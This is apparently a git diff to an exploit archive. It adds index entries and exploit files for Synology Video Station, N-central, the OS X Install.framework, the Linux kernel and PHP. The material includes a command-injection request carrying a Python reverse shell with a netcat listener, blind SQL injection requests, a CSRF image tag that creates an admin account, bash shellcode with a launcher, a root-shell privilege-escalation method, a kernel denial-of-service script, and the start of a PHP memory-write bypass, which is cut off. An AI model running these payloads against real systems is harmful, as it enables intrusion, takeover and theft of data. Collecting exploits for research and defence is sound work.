diff --git a/files.csv b/files.csv
index f16e1f5ff..87aff2a07 100755
--- a/files.csv
+++ b/files.csv
@@ -34396,6 +34396,7 @@ id,file,description,date,author,platform,type,port
 38081,platforms/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - CSRF Vulnerabilities",2015-09-04,"Ken Smith",hardware,webapps,80
 38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
 38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
+38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve(/bin/bash) - 31 bytes",2015-09-06,"Ajith Kp",lin_x86,shellcode,0
 38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
 38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0
@@ -34403,11 +34404,14 @@ id,file,description,date,author,platform,type,port
 38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include Vulnerability",2012-12-30,Amirh03in,php,webapps,0
 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection Vulnerability",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection Vulnerability",2012-12-04,AkaStep,php,webapps,0
+38136,platforms/osx/local/38136.txt,"OS X Install.framework suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
+38137,platforms/osx/local/38137.txt,"OS X Install.framework Arbitrary mkdir_ unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0
 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit (Shell Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,"John Page",jsp,webapps,8081
+38105,platforms/php/webapps/38105.txt,"Wordpress White-Label Framework 2.0.6 - XSS Vulnerability",2015-09-08,Outlasted,php,webapps,80
 38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
 38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0
@@ -34425,3 +34429,19 @@ id,file,description,date,author,platform,type,port
 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
 38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
 38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
+38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
+38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
+38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
+38130,platforms/java/webapps/38130.txt,"N-able N-central Cross-Site Request Forgery Vulnerability",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0
+38131,platforms/php/webapps/38131.txt,"PHP Address Book 'group' Parameter Cross Site Scripting Vulnerability",2012-12-13,"Kenneth F. Belva",php,webapps,0
+38132,platforms/linux/dos/38132.py,"Linux Kernel <= 3.3.5 Btrfs CRC32C feature Infinite Loop Local Denial of Service Vulnerability",2012-12-13,"Pascal Junod",linux,dos,0
+38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter XSS",2012-12-17,MustLive,php,webapps,0
+38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component 'controller' Parameter Local File Include Vulnerability",2012-12-19,Xr0b0t,php,webapps,0
+38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component 'controller' Parameter Local File Include Vulnerability",2012-12-19,Xr0b0t,php,webapps,0
+38138,platforms/osx/local/38138.txt,"OS X Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
+38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin 'transaction' Parameter SQL Injection Vulnerability",2012-12-18,limb0,php,webapps,0
+38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition Remote Arbitrary Command Execution Vulnerability",2012-12-21,i-Hmx,php,webapps,0
+38141,platforms/php/webapps/38141.txt,"Hero Framework search q Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0
+38142,platforms/php/webapps/38142.txt,"Hero Framework users/login username Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0
+38143,platforms/php/webapps/38143.txt,"cPanel 'account' Parameter Cross Site Scripting Vulnerability",2012-12-24,"Rafay Baloch",php,webapps,0
+38144,platforms/php/webapps/38144.txt,"City Reviewer 'search.php' Script SQL Injection Vulnerability",2012-12-22,3spi0n,php,webapps,0
diff --git a/platforms/cgi/webapps/38128.txt b/platforms/cgi/webapps/38128.txt
new file mode 100755
index 000000000..410bf7ceb
--- /dev/null
+++ b/platforms/cgi/webapps/38128.txt
@@ -0,0 +1,106 @@
+------------------------------------------------------------------------
+Synology Video Station command injection and multiple SQL injection
+vulnerabilities
+------------------------------------------------------------------------
+Han Sahin, September 2015
+
+------------------------------------------------------------------------
+Abstract
+------------------------------------------------------------------------
+It was discovered that Synology Video Station is vulnerable to command
+injection that allows an attacker to execute arbitrary system commands
+with root privileges. In addition, Video Station is affected by multiple
+SQL injection vulnerabilities that allows for execution of arbitrary SQL
+statements with DBA privileges. As a result it is possible to compromise
+the PostgreSQL database server.
+
+------------------------------------------------------------------------
+Affected versions
+------------------------------------------------------------------------
+These issues affect Synology Video Station version up to and including
+version 1.5-0757.
+
+------------------------------------------------------------------------
+Fix
+------------------------------------------------------------------------
+Synology has reported that these issue have been resolved in:
+
+- Video Station version 1.5-0757 [audiotrack.cgi]
+- Video Station version 1.5-0763 [watchstatus.cgi]
+- Video Station version 1.5-0763 [subtitle.cgi]
+
+------------------------------------------------------------------------
+Details
+------------------------------------------------------------------------
+
+Command injection vulnerability in subtitle.cgi
+
+A command injection vulnerability exists in the subtitle.cgi CGI script. This issue exists in the 'subtitle_codepage' parameter, which allows an attacker to execute arbitrary commands with root privileges. The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems.
+
+
+- Start netcat on attacker's system:
+
+nc -nvlp 80
+
+- Submit the following request (change the IP - 192.168.1.20 - & port number - 80):
+
+GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1
+Host: 192.168.1.13:5000
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+
+
+SQL injection vulnerability in watchstatus.cgi
+
+A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap.
+
+Proof of concept
+
+POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1
+Host: 192.168.1.13:5000
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-SYNO-TOKEN: Lq6mE9ANV2egU
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 80
+Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+   
+id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1
+
+It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default.
+SQL injection vulnerability in audiotrack.cgi
+
+A (blind) SQL injection vulnerability exists in the audiotrack.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server.
+Proof of concept
+
+POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1
+Content-Length: 294
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-SYNO-TOKEN: 7IKJdJMa8cutE
+Host: <hostname>:5000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+User-Agent: Mozilla/5.0
+Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710
+   
+id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1
+
diff --git a/platforms/java/webapps/38130.txt b/platforms/java/webapps/38130.txt
new file mode 100755
index 000000000..56b7fb155
--- /dev/null
+++ b/platforms/java/webapps/38130.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56933/info
+
+N-central is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+N-central 8.0.1 through 8.2.0-1152 are vulnerable; other versions may also be affected. 
+
+<img src="https://ncentral/addAccountActionStep1.do?page=1&pageName=add_account&email=test%40redacted.co.nz&pswd=CSRF123!!!&confirmPassword=CSRF123!!&paperSize=Letter&numberFormat=en_US&statusEnabled=true&type=SO%20Admin&defaultDashboard=All%20Devices&uiSessionTimeOut=20&configRemoteControlEnabled=on&useRemoteControlEnabled=on&rcAvailability=Available&useManagementTaskEnabled=on&firstName=CSRF&lastName=Hacker&phone=&ext=&department=&street1=&street2=&city=&stateProv=&postalCode=&country=&method=Finish"></img> 
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/38088.c b/platforms/lin_x86/shellcode/38088.c
new file mode 100755
index 000000000..bfd1f91ae
--- /dev/null
+++ b/platforms/lin_x86/shellcode/38088.c
@@ -0,0 +1,49 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86 - execve(/bin/bash) - 31 bytes
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+ 08048060 <.text>:
+ 8048060:	b0 46                	mov    $0x46,%al
+ 8048062:	31 c0                	xor    %eax,%eax
+ 8048064:	cd 80                	int    $0x80
+ 8048066:	eb 07                	jmp    0x804806f
+ 8048068:	5b                   	pop    %ebx
+ 8048069:	31 c0                	xor    %eax,%eax
+ 804806b:	b0 0b                	mov    $0xb,%al
+ 804806d:	cd 80                	int    $0x80
+ 804806f:	31 c9                	xor    %ecx,%ecx
+ 8048071:	e8 f2 ff ff ff       	call   0x8048068
+ 8048076:	2f                   	das    
+ 8048077:	62 69 6e             	bound  %ebp,0x6e(%ecx)
+ 804807a:	2f                   	das    
+ 804807b:	62 61 73             	bound  %esp,0x73(%ecx)
+ 804807e:	68                   	.byte 0x68
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o bash_shell bash_shell.c
+$ execstack -s local_bash
+$ ./ local_bash
+
+---------------------------------------------------------------------------------------------------
+*/
+#include <stdio.h>
+char sh[]="\xb0\x46\x31\xc0\xcd\x80\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\x31\xc9\xe8\xf2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
+void main(int argc, char **argv)
+{
+	int (*func)();
+	func = (int (*)()) sh;
+	(int)(*func)();
+}
\ No newline at end of file
diff --git a/platforms/linux/dos/38132.py b/platforms/linux/dos/38132.py
new file mode 100755
index 000000000..1fd665ff2
--- /dev/null
+++ b/platforms/linux/dos/38132.py
@@ -0,0 +1,107 @@
+source: http://www.securityfocus.com/bid/56939/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause an infinite loop, resulting in a denial-of-service condition. 
+
+#!/usr/bin/env python
+
+## Borrows code from
+"""Calculate and manipulate CRC32.
+http://en.wikipedia.org/wiki/Cyclic_redundancy_check
+-- StalkR
+"""
+## See https://github.com/StalkR/misc/blob/master/crypto/crc32.py
+
+import struct
+import sys
+import os
+
+# Polynoms in reversed notation
+POLYNOMS = {
+  'CRC-32-IEEE': 0xedb88320, # 802.3
+  'CRC-32C': 0x82F63B78, # Castagnoli
+  'CRC-32K': 0xEB31D82E, # Koopman
+  'CRC-32Q': 0xD5828281,
+}
+
+class CRC32(object):
+  """A class to calculate and manipulate CRC32.
+Use one instance per type of polynom you want to use.
+Use calc() to calculate a crc32.
+Use forge() to forge crc32 by adding 4 bytes anywhere.
+"""
+  def __init__(self, type="CRC-32C"):
+    if type not in POLYNOMS:
+      raise Error("Unknown polynom. %s" % type)
+    self.polynom = POLYNOMS[type]
+    self.table, self.reverse = [0]*256, [0]*256
+    self._build_tables()
+
+  def _build_tables(self):
+    for i in range(256):
+      fwd = i
+      rev = i << 24
+      for j in range(8, 0, -1):
+        # build normal table
+        if (fwd & 1) == 1:
+          fwd = (fwd >> 1) ^ self.polynom
+        else:
+          fwd >>= 1
+        self.table[i] = fwd & 0xffffffff
+        # build reverse table =)
+        if rev & 0x80000000 == 0x80000000:
+          rev = ((rev ^ self.polynom) << 1) | 1
+        else:
+          rev <<= 1
+        rev &= 0xffffffff
+        self.reverse[i] = rev
+
+  def calc(self, s):
+    """Calculate crc32 of a string.
+       Same crc32 as in (binascii.crc32)&0xffffffff.
+    """
+    crc = 0xffffffff
+    for c in s:
+      crc = (crc >> 8) ^ self.table[(crc ^ ord(c)) & 0xff]
+    return crc^0xffffffff
+
+  def forge(self, wanted_crc, s, pos=None):
+    """Forge crc32 of a string by adding 4 bytes at position pos."""
+    if pos is None:
+      pos = len(s)
+
+    # forward calculation of CRC up to pos, sets current forward CRC state
+    fwd_crc = 0xffffffff
+    for c in s[:pos]:
+      fwd_crc = (fwd_crc >> 8) ^ self.table[(fwd_crc ^ ord(c)) & 0xff]
+
+    # backward calculation of CRC up to pos, sets wanted backward CRC state
+    bkd_crc = wanted_crc^0xffffffff
+    for c in s[pos:][::-1]:
+      bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c)
+
+    # deduce the 4 bytes we need to insert
+    for c in struct.pack('<L',fwd_crc)[::-1]:
+      bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c)
+
+    res = s[:pos] + struct.pack('<L', bkd_crc) + s[pos:]
+    return res
+
+if __name__=='__main__':
+
+    hack = False
+    ITERATIONS = 10
+    crc = CRC32()
+    wanted_crc = 0x00000000
+    for i in range (ITERATIONS):
+      for j in range(55):
+        str = os.urandom (16).encode ("hex").strip ("\x00")
+        if hack:
+            f = crc.forge(wanted_crc, str, 4)
+            if ("/" not in f) and ("\x00" not in f):
+                file (f, 'a').close()
+        else:
+            file (str, 'a').close ()
+
+      wanted_crc += 1
\ No newline at end of file
diff --git a/platforms/osx/local/38136.txt b/platforms/osx/local/38136.txt
new file mode 100755
index 000000000..bdfd1f905
--- /dev/null
+++ b/platforms/osx/local/38136.txt
@@ -0,0 +1,18 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=478
+
+The Install.framework runner suid root binary does not correctly account for the fact that Distributed Objects
+  can be connected to by multiple clients at the same time.
+
+  By connecting two proxy objects to an IFInstallRunner and calling [IFInstallRunner makeReceiptDirAt:asRoot:]
+  in the first and passing a custom object as the directory name we can get a callback to our code just after the
+  makeReceiptDirAt code has called seteuid(0);setguid(0) to regain privs. Since BSD priviledges are per-process
+  this means that our other proxy object will now have euid 0 without having to provide an authorization reference.
+
+  In this second proxy we can then just call runTaskSecurely and get a root shell before returning from the first proxy's callback function
+  which will then drop privs.
+
+  build using the provided makefile and run passing the full path to the localhost shell
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38136.zip
+
diff --git a/platforms/osx/local/38137.txt b/platforms/osx/local/38137.txt
new file mode 100755
index 000000000..c297b2577
--- /dev/null
+++ b/platforms/osx/local/38137.txt
@@ -0,0 +1,68 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=477
+
+Install.framework has a suid root binary here: /System/Library/PrivateFrameworks/Install.framework/Resources/runner
+  This binary vends the IFInstallRunner Distributed Object, which has the following method:
+
+  [IFInstallRunner makeReceiptDirAt:asRoot:]
+
+  If you pass 1 for asRoot, then this code will treat the makeReceiptDirAt string as a path and make two directories
+  (Library/Receipts) below it. At first glance this code looks immediately racy and no doubt we could play some
+  symlink tricks to get arbitrary directories created, but, on second glance, we can do a lot more!
+
+  This code is using distributed objects which is a "transparent" IPC mechanism: what this means in practise is that
+  not only can I call methods on the IFInstallRunner object running in the suid root process, but I can also pass it objects
+  from my process; when the suid root process then tries to call methods on those object this will actually result in callbacks
+  into my process :)
+
+  In this case rather than just passing an NSString as the makeReceiptDirAt parameter I create and pass an instance of my own class
+  "InitialPathObject" which behaves a bit like a string but gives me complete control over its behaviour from my process.
+
+  By creating a couple of this custom classes and implementing various methods we can reach calls to mkdir, chown and unlink with euid == 0.
+  We can completely control the string passed to mkdir and unlink.
+  In the chown case the code will chown our controlled path to root:admin; regular os x users are members of the admin group which means that this
+  will give the user access to files which previously belonged to a different group.
+
+  To hit the three actions (mkdir, chown and unlink) with controlled arguments we need to override various
+  combinations of selectors and fail at the right points:
+
+  InitialPathObject = the object we pass to the makeReceiptDirAt selector
+    overrides: - stringByAppendingPathComponent
+                 * will be called twice:
+                    * first time:  return an NSString* pointing to a non-existant file
+                    * second time: return SecondFakeStringObject
+
+  SecondFakeStringObject = returned by the second call to stringByAppendingPathComponent
+    overrides: - length
+                 * will be called by the NSFileManager?
+                 * return length of path to non-existant file
+               - getCharacters:
+                 * will be called by the NSFileManager?
+                 * return character of the non-existant file path
+               - fileSystemRepresentation
+                 * for MKDIR:
+                   * first time: return char* of the target path
+                   * second time: return char* to non-existant file
+                   * third time: return char* to non-existant file
+                 * for CHOWN:
+                   * first time: return char* of temporary directory to create and ignore
+                   * second time: return char* of target path
+                 * for UNLINK:
+                   * first time: return char* of temporary directory to create and ignore
+                   * second time: return char* to non-existant file
+                   * third time: return char* to path to unlink
+               - stringByAppendingPathComponent:
+                 * for MKDIR:
+                   * not called
+                 * for CHOWN:
+                   * return NSString* pointing to file which does exist // to bail out before creating /Receipts
+                 * for UNLINK
+                   * not called
+
+  build: clang -o as_root_okay_then_poc as_root_okay_then_poc.m -framework Foundation
+  run: ./as_root_okay_then_poc MKDIR|CHOWN|UNLINK <target>
+
+  note that this will create some root-owned temporary directories in /tmp which will need to be manually cleaned up
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38137.zip
+
diff --git a/platforms/osx/local/38138.txt b/platforms/osx/local/38138.txt
new file mode 100755
index 000000000..36aa1ae9f
--- /dev/null
+++ b/platforms/osx/local/38138.txt
@@ -0,0 +1,56 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=314
+
+The private Install.framework has a few helper executables in /System/Library/PrivateFrameworks/Install.framework/Resources,
+one of which is suid root:
+
+-rwsr-sr-x   1 root  wheel   113K Oct  1  2014 runner
+
+Taking a look at it we can see that it's vending an objective-c Distributed Object :)
+[ https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html ]
+
+The main function immediately temporarily drops privs doing
+  seteuid(getuid()); setegid(getgid());
+
+then reads line from stdin. It passes this to NSConnection rootProxyForConnectionWithRegisteredName to lookup that
+name in the DO namespace and create a proxy to connect to it via.
+
+It then allocates an IFInstallRunner which in its init method vends itself using a name made up of its pid, time() and random()
+
+It then calls the setRunnerConnectionName method on the proxy to tell it the IFInstallRunner's DO name so that whoever
+ran the runner can connect to the IFInstallRunner.
+
+The IFRunnerMessaging protocol tells us the methods and prototypes of the remote methods we can invoke on the IFInstallRunner.
+
+Most of the methods begin with a call to processKey which will set the euid back to root if the process can provide a valid admin
+authorization reference from authd (I'm not totally sure how that bit works yet, but it's not important for the bug.) Otherwise the euid
+will remain equal to the uid and the methods (like movePath, touchPath etc) will only run with the privs of the user.
+
+The methods then mostly end with a call to restoreUIDs which will drop back to euid==uid if we did temporarily regain root privs (with the auth ref.)
+
+Not all methods we can invoke are like that though...
+
+IFInstallRunner setExternalAuthorizationRef calls
+
+  seteuid(0);setegid(0);
+
+to regain root privs without requiring any auth. It then calls AuthorizationCreateFromExternalForm passing the bytes of an NSData we give it.
+
+If that call doesn't return 0 then the error branch calls syslog with the string: "Fatal error: unable to internalize authorization reference."
+but there's actually nothing fatal, it just returns from the method, whereas the success branch goes on to restore euid and egid, which means
+that if we can get AuthorizationCreateFromExternalForm to fail then we can get the priv dropping-regaining state machine out-of-sync :)
+
+Getting AuthorizationCreateFromExternalForm to fail is trivial, just provide a malformed auth_ref (like "AAAAAAAAAAAAAAAAAAA" )
+
+Now the next method we invoke will run with euid 0 even without having the correct auth ref :)
+
+This PoC first calls setBatonPath to point the baton executable path to a localhost bind-shell then triggers the bug
+and calls runTaskSecurely which will create an NSTask and launch the bind-shell with euid 0 :) We can then just nc to it and get a root shell
+
+tl;dr:
+the error path in setExternalAuthorizationRef should either be fatal or drop privs!
+
+Make sure you have the latest xcode installed and run the get_shell.sh script to build and run the PoC.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38138.zip
+
diff --git a/platforms/php/webapps/38105.txt b/platforms/php/webapps/38105.txt
new file mode 100755
index 000000000..a6b59b544
--- /dev/null
+++ b/platforms/php/webapps/38105.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Wordpress White-Label Framework XSS
+# Google Dork: inurl:/wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
+# Date: 7 September 2015
+# Exploit Author: Outlasted
+# Software Link: wordpress.com / http://whitelabelframework.com/
+# Version: 2.0.6
+#Greetz to: TeaMp0isoN
+=====================================================
+Vulnerable url: /wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
+
+
+=====================================================
+How to exploit?
+----------------------------------------------------------------------------------------------------------
+
+Enter your XSS payload in all forms and watch the magic.
\ No newline at end of file
diff --git a/platforms/php/webapps/38127.php b/platforms/php/webapps/38127.php
new file mode 100755
index 000000000..54eb97a4b
--- /dev/null
+++ b/platforms/php/webapps/38127.php
@@ -0,0 +1,433 @@
+<?php
+// EDB Note: Paper https://www.exploit-db.com/docs/38104.pdf
+error_reporting(0x66778899);
+set_time_limit(0x41424344);
+define('ZEND_INI_USER', (1<<0));
+define('ZEND_INI_PERDIR', (1<<1));
+define('ZEND_INI_SYSTEM', (1<<2));
+
+/*
+00df9000-00e16000 rw-p 00000000 00:00 0 
+017ff000-01a51000 rw-p 00000000 00:00 0                                  [heap]
+error_reporting(0x66778899);
+
+typedef struct bucket {
+	ulong h;						/\* Used for numeric indexing *\/
+	uint nKeyLength;
+	void *pData;
+	void *pDataPtr;
+	struct bucket *pListNext;
+	struct bucket *pListLast;
+	struct bucket *pNext;
+	struct bucket *pLast;
+	const char *arKey;
+} Bucket;
+
+typedef struct _hashtable {
+	uint nTableSize;
+	uint nTableMask;
+	uint nNumOfElements;
+	ulong nNextFreeElement;
+	Bucket *pInternalPointer;	/\* Used for element traversal *\/
+	Bucket *pListHead;
+	Bucket *pListTail;
+	Bucket **arBuckets;
+	dtor_func_t pDestructor; //pointer
+	zend_bool persistent;
+	unsigned char nApplyCount;
+	zend_bool bApplyProtection;
+#if ZEND_DEBUG
+	int inconsistent;
+#endif
+} HashTable;
+
+struct _zend_executor_globals {
+	zval **return_value_ptr_ptr;
+
+	zval uninitialized_zval;
+	zval *uninitialized_zval_ptr;
+
+	zval error_zval;
+	zval *error_zval_ptr;
+
+	zend_ptr_stack arg_types_stack;
+
+	/\* symbol table cache *\/
+	HashTable *symtable_cache[SYMTABLE_CACHE_SIZE];
+	HashTable **symtable_cache_limit;
+	HashTable **symtable_cache_ptr;
+
+	zend_op **opline_ptr;
+
+	HashTable *active_symbol_table;
+	HashTable symbol_table;		/\* main symbol table *\/
+
+	HashTable included_files;	/\* files already included *\/
+
+	JMP_BUF *bailout;
+
+	int error_reporting;
+	int orig_error_reporting;
+	int exit_status;
+
+	zend_op_array *active_op_array;
+
+	HashTable *function_table;	/\* function symbol table *\/
+	HashTable *class_table;		/\* class table *\/
+	HashTable *zend_constants;	/\* constants table *\/
+
+	zend_class_entry *scope;
+	zend_class_entry *called_scope; /\* Scope of the calling class *\/
+
+	zval *This;
+
+	long precision;
+
+	int ticks_count; //10*8
+
+	zend_bool in_execution;  //typedef unsigned char zend_bool;
+	HashTable *in_autoload;
+	zend_function *autoload_func;
+	zend_bool full_tables_cleanup;
+
+	/\* for extended information support *\/
+	zend_bool no_extensions;
+
+#ifdef ZEND_WIN32
+	zend_bool timed_out;
+	OSVERSIONINFOEX windows_version_info;
+#endif
+
+	HashTable regular_list;
+	HashTable persistent_list;
+
+	zend_vm_stack argument_stack;
+
+	int user_error_handler_error_reporting;
+	zval *user_error_handler;
+	zval *user_exception_handler;
+	zend_stack user_error_handlers_error_reporting;
+	zend_ptr_stack user_error_handlers;
+	zend_ptr_stack user_exception_handlers;
+
+	zend_error_handling_t  error_handling;
+	zend_class_entry      *exception_class;
+
+	/\* timeout support *\/
+	int timeout_seconds;
+
+	int lambda_count;
+
+	HashTable *ini_directives;
+	HashTable *modified_ini_directives;
+	zend_ini_entry *error_reporting_ini_entry;	                
+
+	zend_objects_store objects_store;
+	zval *exception, *prev_exception;
+	zend_op *opline_before_exception;
+	zend_op exception_op[3];
+
+	struct _zend_execute_data *current_execute_data;
+
+	struct _zend_module_entry *current_module;
+
+	zend_property_info std_property_info;
+
+	zend_bool active; 
+
+	zend_op *start_op;
+
+	void *saved_fpu_cw_ptr;
+#if XPFPA_HAVE_CW
+	XPFPA_CW_DATATYPE saved_fpu_cw;
+#endif
+
+	void *reserved[ZEND_MAX_RESERVED_RESOURCES];
+};
+
+/*
+struct _zend_ini_entry {
+int module_number;
+int modifiable;
+char *name;
+uint name_length;
+ZEND_INI_MH((*on_modify));
+void *mh_arg1;
+void *mh_arg2;
+void *mh_arg3;
+char *value;
+....
+
+*/
+//echo file_get_contents("/proc/self/maps");
+
+$mem = fopen("/proc/self/mem", "rb");
+
+/*
+ylbhz@ylbhz-Aspire-5750G:/tmp$ php -r "echo file_get_contents('/proc/self/maps');"
+00400000-00bf3000 r-xp 00000000 08:01 4997702                            /usr/bin/php5
+00df3000-00e94000 r--p 007f3000 08:01 4997702                            /usr/bin/php5
